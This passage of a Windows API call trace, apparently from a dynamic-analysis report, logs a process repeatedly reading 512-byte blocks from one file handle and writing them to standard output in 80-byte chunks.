lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.461] GetFileType (hFile=0x50) returned 0x1 [0209.461] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.462] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.462] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] GetFileType (hFile=0x50) returned 0x1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.462] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.462] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.463] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.463] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] GetFileType (hFile=0x50) returned 0x1 [0209.463] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.463] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.464] GetFileType (hFile=0x50) returned 0x1 [0209.464] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.465] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.465] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] GetFileType (hFile=0x50) returned 0x1 [0209.465] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.465] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.466] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.466] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] GetFileType (hFile=0x50) returned 0x1 [0209.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.466] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] GetFileType (hFile=0x50) returned 0x1 [0209.467] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.467] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.468] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.468] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] GetFileType (hFile=0x50) returned 0x1 [0209.468] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.468] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.469] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.469] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] GetFileType (hFile=0x50) returned 0x1 [0209.469] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.469] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.470] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.470] GetFileType (hFile=0x50) returned 0x1 [0209.471] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.471] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.471] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.471] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.472] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.472] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.472] GetFileType (hFile=0x50) returned 0x1 [0209.472] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.473] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, 